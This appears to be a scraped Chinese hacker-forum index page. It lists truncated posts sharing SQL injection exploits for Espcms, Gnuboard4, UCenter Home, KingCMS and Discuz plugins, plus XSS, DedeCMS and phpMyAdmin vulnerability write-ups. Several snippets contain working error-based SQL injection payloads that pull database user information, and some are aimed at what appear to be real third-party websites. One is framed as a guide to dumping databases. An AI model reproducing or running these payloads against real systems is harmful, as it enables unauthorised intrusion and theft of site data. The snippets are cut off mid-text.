Web安全
Espcms SQL Injection Exploit (解除封号危机发个exp.)
前段时间t00ls关闭的时候挖的,一直想发,前段时间一直提示来路不正确. 所以现在发个exp,分析文章网上应该都有了.<?phpprint_r('+-----------------------------------------------+Espcms SQL Injection ExploitAuthor: Desperado && n3wfUsing The Exploit, You Can Hack The WorldCode By Desperado+-
DEDECMS 鸡肋2次安装漏洞
我怕ban。。。。。。黑阔们 51 快乐测试版本:5.7漏洞文件1dede/login.php//检测安装目录安全性if( is_dir(dirname(__FILE__).'/../install') ){ if(!file_exists(dirname(__FILE__).'/../install/install_lock.txt') ) { $fp = fopen(dirname(__FILE__).'/../install/install_lock.txt', '
T00ls庆五一礼物之二:Gnuboard4 SQL Injection
棒子程序, 棒子国90%的论坛都是用的这屌程序, 我是本着无聊的心情读的, 绝非搞啥韩国数据什么的 = =因为某SB的一句此程序有GETSHELL, 害的我苦读, 是谁就不说了, 最终注射一堆堆, GETSHELL没读到, 擦{:6_428:}不废话,上代码: <? // \bbs\poll_update.phpinclude_once("./_common.php");$po = sql_fet
T00ls庆五一礼物之一:Ucenter Home SQL Injection 【GPC=OFF】
苦逼的屌丝祝土司各位黑客五一节快乐啊, 玩的开心!{:6_393:}最近实在太累太忙, 稍微闲下来就读了下, 程序整体还是比较安全的, 反正我等小菜是没读到GETSHELL什么的先炒个冷饭吧, 11年alibaba大牛发的注射至今未补, 康盛估计是不管这程序了 - -SQL Injection 1:<?php // \source\cp_profile.php.......
KingCMS 1.0 SQL Injection
官网:http://www.kingcms.com/download/local/10//**分页列表信息@param int listid : 列表id@return array*/public function infoList($listid=null){global $king;if(!$listid)$listid=kc_get('listid',2,1);//必须的if($listid==0)return;$cachepath='portal/list/'.$listid;$array=$king->cache->
Multiple Vulnerabilities in phpMyAdmin
Author: Janek Vind "waraxe" Date: 25. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-103.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ phpMyAdmin is a free software tool written in
Xiuno BBS XSS Vulnerability 简单的xss白盒分析
前言 刷微博的时候看到到seay发个了霸气外泄的cms:http://www.cnseay.com/2660/,官方介绍 Xiuno 这个名字来源于圣斗士星矢白羊座的黄金圣斗士修罗,他的攻击速度和战斗力是十二宫最强的,他是速度和力量的化身;在佛教里面,修罗为六道之一,处于人道和天道之间的一道,半人半神,性情刚烈,好战
DZx2.5 插件漏洞sql注入 {科普脱裤}
作者:j8ghttp://nba2kol.org/plugin.php?id=v63shop:goods&pac=info&gid=110%20or%20@`'`%20and%20(select%20*%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20user()))a%20from%20information_schema.tables%20group%20by%20a)b)%20or%20@`'`直接看图吧~~=========================
最新Discuz交友插件漏洞附EXP
DZ交友插件漏洞jiaoyou.php?pid=1有的注入需要登录,注入代码如下:' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x
最新DZ X2.5 0DAY (By saviour) 附EXP
DZ 插件注入漏洞!前几天看COG发布 但阅读权限得200 (管理员才可以查看) 刚去看了下已经公开了 所以我就转过来了Exp:http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from informatio